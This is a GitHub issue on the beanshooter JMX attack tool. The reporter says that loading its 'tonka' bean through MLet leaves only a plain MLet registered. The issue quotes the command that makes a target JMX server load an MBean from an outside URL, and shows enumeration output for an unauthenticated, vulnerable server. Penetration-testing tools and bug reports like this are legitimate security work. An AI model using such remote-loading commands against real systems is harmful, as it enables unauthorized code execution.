Skip to content

Tonka creation resulting in mlet #31

New issue
New issue
Open
Open
Tonka creation resulting in mlet#31
@dinosn

Description

@dinosn
dinosn
opened on Apr 13, 2023

Hello,

One more tiny issue that I noticed on recent testing, in many cases the attempt to load a tonka bean will result in a plain mlet,

The command that is used to load the tonka is either from mlet request of from deploy, for example:

root@system:~/tools/rmi/remote-method-guesser# java2 -jar ../beanshooter/beanshooter-4.1.0-jar-with-dependencies.jar mlet load xx.xx.xx.xx 12340 tonka http://aa.bb.cc.dd
[+] Loading MBean from http://aa.bb.cc.dd
[+]
[+] MBean was loaded successfully.
root@system:~/tools/rmi/remote-method-guesser# java2 -jar ../beanshooter/beanshooter-4.1.0-jar-with-dependencies.jar enum xx.xx.xx.xx 12340 
[+] Checking available bound names:
[+]
[+] 	* jmxrmi (JMX endpoint: xx.xx.xx.xx:45277)
[+]
[+] Checking for unauthorized access:
[+]
[+] 	- Remote MBean server does not require authentication.
[+] 	  Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] 	- Remote MBeanServer accepted the payload class.
[+] 	  Configuration Status: Non Default
[+]
[+] Checking available MBeans:
[+]
[+] 	- 32 MBeans are currently registred on the MBean server.
[+] 	  Listing 15 non default MBeans:
[+] 	  - org.apache.logging.log4j.core.jmx.LoggerContextAdmin (org.apache.logging.log4j2:type=397577f9)
[+] 	  - oracle.ucp.admin.JDBCUniversalConnectionPoolMBeanImpl (oracle.ucp.admin.UniversalConnectionPoolMBean:name=UniversalConnectionPoolManager-2800480111575401019-2-amdux113)
[+] 	  - org.apache.logging.log4j.core.jmx.StatusLoggerAdmin (org.apache.logging.log4j2:type=397577f9,component=StatusLogger)
[+] 	  - javax.management.loading.MLet (DefaultDomain:type=MLet) (action: mlet) <--
[+] 	  - org.apache.logging.log4j.core.jmx.LoggerConfigAdmin (org.apache.logging.log4j2:type=397577f9,component=Loggers,name=)
[+] 	  - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=error)
[+] 	  - com.sun.management.UnixOperatingSystem (java.lang:type=OperatingSystem)
[+] 	  - oracle.ucp.admin.UniversalConnectionPoolManagerMBean (oracle.ucp.admin:name=UniversalConnectionPoolManagerMBean)
[+] 	  - sun.management.HotSpotDiagnostic (com.sun.management:type=HotSpotDiagnostic) (action: hotspot)
[+] 	  - oracle.jdbc.driver.OracleDiagnosabilityMBean (com.oracle.jdbc:type=diagnosability,name=sun.misc.Launcher$AppClassLoader@397577f9)
[+] 	  - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=console)
[+] 	  - batchManager.BatchManager (BatchManager:name=BatchManagerInfo)
[+] 	  - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=info)
[+] 	  - org.apache.logging.log4j.core.jmx.ContextSelectorAdmin (org.apache.logging.log4j2:type=397577f9,component=ContextSelector)
[+] 	  - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=warn)

Mlet MBean was not previously registered on the environment but I would had expected the tonka bean to load. Is it something that I'm performing in a wrong order maybe?

Regards,
Nicolas

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions